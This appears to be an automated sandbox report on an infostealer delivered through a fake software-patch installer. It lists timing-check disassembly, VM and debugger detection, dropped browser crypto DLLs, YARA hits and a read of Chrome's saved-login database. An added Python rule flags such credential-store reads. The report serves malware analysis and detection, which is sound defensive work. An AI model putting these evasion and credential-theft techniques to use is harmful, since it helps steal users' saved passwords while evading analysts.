Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe RDTSC instruction interceptor: First address: 0000000000BA7F6C second address: 0000000000BFEDE4 instructions: 0x00000000 rdtsc 0x00000002 cmc 0x00000003 sub esi, 00000008h 0x00000009 test dh, FFFFFFAFh 0x0000000c clc 0x0000000d mov dword ptr [esi], edx 0x0000000f mov dword ptr [esi+04h], eax 0x00000012 sub edi, 00000004h 0x00000018 btr ax, 004Ch 0x0000001d xor al, 6Eh 0x0000001f mov eax, dword ptr [edi] 0x00000021 test si, 0EC0h 0x00000026 cmc 0x00000027 xor eax, ebx 0x00000029 jmp 00007F3880C65F7Bh 0x0000002e not eax 0x00000030 inc eax 0x00000031 jmp 00007F3880A032B5h 0x00000036 bswap eax 0x00000038 jmp 00007F3880C9CF65h 0x0000003d inc eax 0x0000003e cmp si, dx 0x00000041 jmp 00007F3880C8C1F9h 0x00000046 xor ebx, eax 0x00000048 cmp edi, 54DC680Dh 0x0000004e jmp 00007F3880C32E1Ah 0x00000053 add ebp, eax 0x00000055 jmp 00007F3880E20AC4h 0x0000005a jmp 00007F3880A1952Eh 0x0000005f lea ecx, dword ptr [esp+60h] 0x00000063 cmp esi, ecx 0x00000065 jmp 00007F3880CA8223h 0x0000006a ja 00007F3880D08B20h 0x00000070 jmp ebp 0x00000072 mov ecx, dword ptr [esi] 0x00000074 cmovnb edx, ebx 0x00000077 mov dh, 00000054h 0x0000007a rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe RDTSC instruction interceptor: First address: 0000000000BEF6D9 second address: 0000000000BFEDE4 instructions: 0x00000000 rdtsc 0x00000002 test esp, edi 0x00000004 cmp ecx, 48F76367h 0x0000000a sub esi, 00000008h 0x00000010 mov dword ptr [esi], edx 0x00000012 cmc 0x00000013 test esp, 07E44ACCh 0x00000019 mov dword ptr [esi+04h], eax 0x0000001c bt ax, 004Bh 0x00000021 rcl al, cl 0x00000023 xchg ah, al 0x00000025 lea edi, dword ptr [edi-00000004h] 0x0000002b lahf 0x0000002c mov ax, 74F3h 0x00000030 mov eax, dword ptr [edi] 0x00000032 clc 0x00000033 xor eax, ebx 0x00000035 jmp 00007F3880AC1624h 0x0000003a not eax 0x0000003c jmp 00007F3880B1F93Ah 0x00000041 inc eax 0x00000042 bswap eax 0x00000044 jmp 00007F3880DE2414h 0x00000049 inc eax 0x0000004a cmc 0x0000004b test eax, edi 0x0000004d xor ebx, eax 0x0000004f cmc 0x00000050 cmp sp, 1B06h 0x00000055 add ebp, eax 0x00000057 jmp 00007F3880A32C34h 0x0000005c jmp 00007F3880DA6E3Bh 0x00000061 lea ecx, dword ptr [esp+60h] 0x00000065 cmp esi, ecx 0x00000067 jmp 00007F3880CA80C3h 0x0000006c ja 00007F3880D089C0h 0x00000072 jmp ebp 0x00000074 mov ecx, dword ptr [esi] 0x00000076 cmovnb edx, ebx 0x00000079 mov dh, 00000054h 0x0000007c rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe RDTSC instruction interceptor: First address: 0000000000B67EE1 second address: 0000000000B67EEC instructions: 0x00000000 rdtsc 0x00000002 mov ebp, 6C567DA2h 0x00000007 pop ebp 0x00000008 bswap esi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\KbqArOlW06.exe TID: 2236 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Evasive API call chain: GetSystemTime,DecisionNodes
Source: C:\Users\user\Desktop\KbqArOlW06.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q7MJ8.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Registry key enumerated: More than 174 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe API call chain: ExitProcess graph end node
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.507528842.00000000012B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}!
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.507528842.00000000012B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MWar&Prod_VMware_SATA_CD00#5&280b647)
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_0040A050 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 21_2_0040A050
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00476F44 FindFirstFileA,FindNextFileA,FindClose, 22_2_00476F44
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0049AF28 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 22_2_0049AF28
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_004650D0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 22_2_004650D0
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00453238 FindFirstFileA,GetLastError, 22_2_00453238
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0046554C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 22_2_0046554C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00463B44 FindFirstFileA,FindNextFileA,FindClose, 22_2_00463B44
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe System information queried: ModuleInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00450A28 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 22_2_00450A28
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe System information queried: KernelDebuggerInformation
Source: C:\Users\user\Desktop\KbqArOlW06.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe "C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe"
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process created: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe "C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0047A678 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle, 22_2_0047A678
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0042E52C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid, 22_2_0042E52C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0042F294 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA, 22_2_0042F294
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: GetLocaleInfoA, 21_2_00405694
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: GetLocaleInfoA, 21_2_004056E0
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: GetLocaleInfoA, 22_2_004089F8
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: GetLocaleInfoA, 22_2_00408A44
Source: C:\Users\user\Desktop\KbqArOlW06.exe Queries volume information: C:\Users\user\Desktop\KbqArOlW06.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_004026C4 GetSystemTime, 21_2_004026C4
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00455DCC GetUserNameA, 22_2_00455DCC
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00458E58 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle, 22_2_00458E58
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_00404654 GetModuleHandleA,GetVersion,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDEPPolicy, 21_2_00404654

Stealing of Sensitive Information

Source: Yara match File source: 0.3.KbqArOlW06.exe.16636690.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16726700.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.18de6818.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.179e67e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.166866c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16866738.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16ae6770.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16fe67a8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.2.0.0-beta2.cps.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.18de6818.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.2.0.0-beta2.cps.exe.9a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.2.0.0-beta2.cps.exe.9a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.2.0.0-beta2.cps.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16636690.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16726700.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16866738.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16ae6770.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.179e67e0.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.166866c8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.2.0.0-beta2.cps.exe.9a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16fe67a8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.264598811.000000001DAA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.249916384.0000000018DE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.491962653.0000000001250000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271980164.0000000026172000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.491186607.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.474319850.0000000001251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.275645439.0000000036F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.235992777.00000000166BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.507099567.000000000122A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.469967022.0000000001253000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.236293949.000000001675D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.235782523.000000001666D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.492733952.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.477408811.0000000001251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.244960789.00000000179E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.465053520.0000000001259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.236963971.000000001689D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.285645229.000000004EF02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.235724819.000000001662F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.237949559.0000000016B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match File source: Process Memory Space: 2.0.0-beta2.cps.exe PID: 2332, type: MEMORYSTR
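The "File opened" line above is the behavioural core of this section: the dropped 2.0.0-beta2.cps.exe (PID 2332) reads Chrome's Login Data, the SQLite store of saved logins, and nothing but the browser itself normally opens that file. The block below is an added example, not code from this report or from the sandbox: a small Python pass over constructed file-access events of the kind Sysmon or an EDR would emit, flagging credential-store reads by non-browser processes. The pipe-delimited `pid|image|target` event format, the allow-list of browser images, the list of credential-store paths and every process other than the one named in the report are assumptions made for illustration.

```python
"""Flag processes that read browser credential stores.

Added example (not from the sandbox report). The event format, the
allow-list, the path patterns and all sample events except the
2.0.0-beta2.cps.exe / Login Data pair are assumptions for illustration.
"""
import ntpath
import re
from dataclasses import dataclass

# Credential/session stores an infostealer typically reads (assumed list).
CREDENTIAL_STORE_PATTERNS = [
    re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\Login Data$", re.I),
    re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\Web Data$", re.I),
    re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\Cookies$", re.I),
    re.compile(r"\\Google\\Chrome\\User Data\\Local State$", re.I),
    re.compile(r"\\Microsoft\\Edge\\User Data\\[^\\]+\\Login Data$", re.I),
    re.compile(r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\logins\.json$", re.I),
]

# Images that legitimately open those files (assumed allow-list, by basename).
ALLOWED_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe"}

# Loaders drop their payloads into user-writable directories (assumption).
USER_WRITABLE_DIR = re.compile(r"\\AppData\\(Local\\Temp|Roaming)\\", re.I)

# Constructed sample events: pid|image|target. Only the PID 2332 / Login Data
# pair corresponds to what the report shows; the rest is made up.
SAMPLE_EVENTS = r"""
1640|C:\Program Files\Google\Chrome\Application\chrome.exe|C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
2332|C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe|C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
2332|C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe|C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State
4212|C:\Windows\explorer.exe|C:\Users\user\Documents\notes.txt
5120|C:\Users\user\AppData\Roaming\svc.exe|C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\abc123.default\logins.json
"""


@dataclass
class FileEvent:
    pid: int
    image: str   # full path of the process that opened the file
    target: str  # file that was opened


def parse_event(line: str) -> FileEvent:
    """Parse one pid|image|target line (assumed format)."""
    pid, image, target = line.split("|", 2)
    return FileEvent(int(pid), image, target)


def is_credential_store(path: str) -> bool:
    """True if the path is one of the known browser credential stores."""
    return any(p.search(path) for p in CREDENTIAL_STORE_PATTERNS)


def classify(event: FileEvent):
    """Return a reason string if the access is suspicious, else None."""
    if not is_credential_store(event.target):
        return None
    if ntpath.basename(event.image).lower() in ALLOWED_IMAGES:
        return None
    reasons = ["non-browser process read a browser credential store"]
    if USER_WRITABLE_DIR.search(event.image):
        reasons.append("image runs from a user-writable directory")
    return "; ".join(reasons)


def find_suspicious(log_text: str):
    """Return (pid, image basename, target, reason) for every suspicious event."""
    hits = []
    for line in log_text.strip().splitlines():
        ev = parse_event(line)
        reason = classify(ev)
        if reason:
            hits.append((ev.pid, ntpath.basename(ev.image), ev.target, reason))
    return hits


if __name__ == "__main__":
    for pid, image, target, reason in find_suspicious(SAMPLE_EVENTS):
        print(f"PID {pid} {image} -> {target}: {reason}")
```

On the constructed events this yields three hits, two for PID 2332 and one for the Firefox profile reader, and none for chrome.exe. Allow-listing by image basename is the weak point of such a rule: a stealer can name itself chrome.exe, so in production the check should also require the expected install path or signer, and the hit should be correlated with the process tree, which in this report puts the reader under the installer chain rather than under the browser.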

Remote Access Functionality

Source: Yara match File source: 0.3.KbqArOlW06.exe.16636690.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16726700.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.18de6818.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.179e67e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.166866c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16866738.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16ae6770.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16fe67a8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.2.0.0-beta2.cps.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.18de6818.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.2.0.0-beta2.cps.exe.9a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.2.0.0-beta2.cps.exe.9a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.2.0.0-beta2.cps.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16636690.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16726700.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16866738.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16ae6770.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.179e67e0.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.166866c8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.2.0.0-beta2.cps.exe.9a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.KbqArOlW06.exe.16fe67a8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.264598811.000000001DAA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.249916384.0000000018DE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.491962653.0000000001250000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271980164.0000000026172000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.491186607.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.474319850.0000000001251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.275645439.0000000036F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.235992777.00000000166BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.507099567.000000000122A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.469967022.0000000001253000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.236293949.000000001675D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.235782523.000000001666D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.492733952.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.477408811.0000000001251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.244960789.00000000179E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.465053520.0000000001259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.236963971.000000001689D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.285645229.000000004EF02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.235724819.000000001662F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.237949559.0000000016B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY